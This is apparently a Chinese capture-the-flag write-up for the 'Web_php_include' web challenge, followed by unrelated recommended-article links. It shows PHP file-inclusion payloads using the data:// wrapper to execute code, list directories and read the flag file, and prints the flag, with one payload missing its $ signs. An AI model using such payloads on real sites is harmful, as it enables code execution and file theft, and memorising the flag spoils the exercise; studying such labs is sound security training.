攻防世界---Web_php_include

1.题目链接

2.补充知识:

3.构造:执行成功

/?page=data://text/plain,<?php phpinfo()?>

4.构造下面url,得到目录路径

/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']?>

5构造下面url,读取该路径的文件

?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

6.构造下面url,读取fl4gisisish3r3.php内容。htmlspecialchars($a)在网页上显示文本 。

/?page=data://text/plain,<?php a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars(a); ?>

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

相关推荐
委婉待续26 分钟前
Qt的学习(三)
开发语言·qt·学习
白总Server31 分钟前
Golang实现分布式Masscan任务调度系统
java·运维·服务器·开发语言·分布式·后端·golang
leo030842 分钟前
新一代python管理工具--uv
开发语言·python·uv
熊猫钓鱼>_>1 小时前
Python小工具开发实战:从零构建自动化文件管理器的心得与体悟
开发语言·python·自动化
lb29171 小时前
关于golang热加载安装,实时响应
开发语言·后端·golang·热加载
陈奕迅本讯1 小时前
并发编程-Synchronized
开发语言·c#
康小庄1 小时前
AQS独占模式——资源获取和释放源码分析
java·开发语言·jvm·spring boot·spring·spring cloud·nio
中云DDoS CC防护蔡蔡1 小时前
自己的服务器被 DDOS跟CC攻击了怎么处理,如何抵御攻击?
运维·服务器·经验分享·网络安全·ddos
草明1 小时前
macOS 查看当前命令行的ruby的安装目录
开发语言·macos·ruby
汤姆yu1 小时前
基于python大数据的nba球员可视化分析系统
大数据·开发语言·python